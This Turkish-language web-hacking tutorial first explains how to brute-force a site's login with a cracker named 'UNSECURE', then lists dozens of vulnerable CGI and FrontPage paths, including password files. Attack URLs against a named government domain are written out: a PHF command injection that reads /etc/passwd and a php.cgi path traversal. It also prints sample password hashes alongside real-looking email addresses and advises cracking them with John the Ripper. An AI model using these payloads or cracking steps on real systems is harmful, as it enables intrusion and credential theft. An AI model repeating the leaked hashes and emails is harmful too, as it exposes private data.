UNSECURE
Kullanim olarakda oldukca basit olan bir webhack programıdır
Tanıtım
Computer Ip:Buraya baglanacagimiz sitenin ip no'sunu yaziyoruz.(İp no'sunu Cute Ftp programından sitenin url'sini yazarak bulabilirsiniz)
Port:Değiştirmeyin
Current Password: Değiştirmeyin
Username:Sitenin kullanıcı ismini giriyoruz.
Dictionray File: Burayı değiştirmiyoruz.
Attack Options:Dictionary Attack'ı secip BruteForce secenegini kapıyoruz.
Custom character sets:Bunu seciyoruz bütün karakterleri dener.
Number of Charecters to Start on:Burdada kac karakterden baslayacagnız secilir.Örnegin;freeservers en az 6 haneli oldugu icin 6'yı seciniz.
Kullanım
Program sifresini ögrenmek istedigimiz sitenin sizin sectiginiz kullanıcı ismine değişik sifreler deniyerek baglanmaya calısıyor.Denediği sifreleri unsdic.txt adlı dosyaya kaydediyor.
Program verdigniz kullanıcı adının sifresini deneme yanılma yöntemiyle kırmaya calısır.Sizin verdigniz wordlistleride teker teker dener ve wordlistin icinde sayfanın sifresi varsa size haber verir ve sifreyi gösterir
CGİ-AÇIKLARI
Web sitelerini CGI açıklarından faydalanarak kırmanın iki yolu vardır.
1-) Yol: Bilindik CGI'ları browser'ımızın adres satırına yazarak manuel olarak ararız. Bilindik CGI ve diğer script açıkları şöyle:
aglimpse > /cgi-bin/aglimpse
AnyForm2 > /cgi-bin/AnyForm2
args.bat > /cgi-dos/args.bat
AT-admin > /cgi-bin/AT-admin.cgi
bnbform.cgi > /cgi-bin/bnbform.cgi
campas > /cgi-bin/campas
carbo.dll > /carbo.dll
CGImail.exe > /scripts/CGImail.exe
cgiwrap > /cgi-bin/cgiwrap
classifieds.cgi > /cgi-bin/classifieds.cgi
Count.cgi > /cgi-bin/Count.cgi
displayopenedfile.cfm > /cfdocs/expelval/displayopenedfile.cfm
docs/codebrws.asp > /iissamples/sdk/asp/docs/codebrws.asp
edit.pl > /cgi-bin/edit.pl
environ.cgi > /cgi-bin/environ.cgi
exprcalc.cfm > /cfdocs/expelval/exprcalc.cfm
Fax Survey > /cgi-bin/faxsurvey
filemail.pl > /cgi-bin/filemail.pl
files.pl > /cgi-bin/files.pl
Finger > /cgi-bin/finger
fpcount.exe > /scripts/fpcount.exe
glimpse > /cgi-bin/glimpse
guestbook.cgi > /cgi-bin/guestbook.cgi
Handler > /cgi-bin/handler
howitworks/codebrws.asp > /iissamples/exair/howitworks/codebrws.asp
HTML Script > /cgi-bin/htmlscript
HTIMAGE > cgi-bin/htimage.exe
info2www > /cgi-bin/info2www
issadmin/bir.htr > /scripts/issadmin/bdir.htr
jj > /cgi-bin/jj
maillist.pl > /cgi-bin/maillist.pl
man.sh > /cgi-bin/man.sh
newdsn.exe > /scripts/tools/newdsn.exe
nph-publish > /cgi-bin/nph-publish
nph-test-cgi > /cgi-bin/nph-test-cgi
openfile.cfm > /cfdocs/expelval/openfile.cfm
perl.exe > /cgi-bin/perl.exe
perlshop.cgi > /cgi-bin/perlshop.cgi
PF Display > /cgi-bin/pfdispaly.cgi
PHF > /cgi-bin/phf
PHP > /cgi-bin/php.cgi
rguest.exe > /cgi-bin/rguest.exe
search97.vts > /search97.vts
sendmail.cfm > /cfdocs/expelval/sendmail.cfm
showcode.asp > /msads/Samples/SELECTOR/showcode.asp
survey.cgi > /cgi-bin/survey.cgi
Test-CGI > /cgi-bin/test-cgi
textcounter.pl > /cgi-bin/textcounter.pl
THC - Backdoor > /cgi-bin/rwwwshell.pl
uploader.exe > /cgi-win/uploader.exe
view-source > /cgi-bin/view-source
view-source > /cgi-bin/view-source
VTI BIN [shtml.dll] > /_vti_bin/shtml.dll
VTI BIN [shtml.exe] > /_vti_bin/shtml.exe
VTI INF [_vti_inf.html] > /_vti_inf.html
VTI PVT [administrators.pwd] > /_vti_pvt/administrators.pwd
VTI PVT [authors.pwd] > /_vti_pvt/authors.pwd
VTI PVT [service.pwd] > /_vti_pvt/service.pwd
VTI PVT [users.pwd] > /_vti_pvt/users.pwd
Web Sendmail > /cgi-bin/websendmail
webdist.cgi > /cgi-bin/webdist.cgi
WebGais > /cgi-bin/webgais
wguest.exe > /cgi-bin/wguest.exe
wrap > /cgi-bin/wrap
www-sql > /cgi-bin/www-sql
wwwboard.pl > /cgi-bin/wwwboard.pl
2-) Yol: Manuel olarak aramak yerine işimizi kolaylaştırmak için bir CGI Scanner kullanabiliriz. Not: CGI'ları aradığınız sitede bulursanız bunu çalıştıran exploit'i de bulmanız gerekir.
Şimdi diyelim ki iki yoldan birini kullanarak PHF açığını bulduk. Bunu şöyle kullanırız: http://www.mit.gov.tr/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
yazarız (adres örnek olarak yazılmıştır. Herhangi bir art niyet yoktur;o))
Tabii çıkan dosya etc içindeki username ve password'lerin olduğu password dosyası olacaktır. Şu şekilde:
slasher:VTNaA6DjT/9ME:1603:100:,robertmaier@gmx.net,,:/home/slasher:/bin/bashpar
mcgreen:ryKOFkUDiGO3A:1604:100:,mail@reinhard-gruene.de,,:/home/mcgreen:/bin/bashpar
abi98:cUp.uUzNzr8YY:1605:100:,baileyberni@gmx.de,,:/home/abi98:/bin/bashpar
henner_:ziprJNh85rk.o:1606:100:,henner_@web.de,,:/home/henner_:/bin/bashpar
Çıkan password'ları bir password cracker ile kırabilirsiniz (John The Ripper tavsiye edilir.) Manuel olarak veya bir program yardımıyla hack etmek istediğimiz sayfada service.pwd varsa ne yapacağız?
http://www.mit.gov.tr/_vti_pvt/services.pwd
yazarız.
İşte bir de PHP CGI örneği:
http://www.mit.gov.tr/cgi-bin/php.cgi?../../../etc/passwd
Bu örneklere bakarak olayın mantığını biraz da olsa kavrayabilirsiniz. Bug'ı bulduktan sonra exploit'ini bulup veya yazıp çalıştırmanız gerek.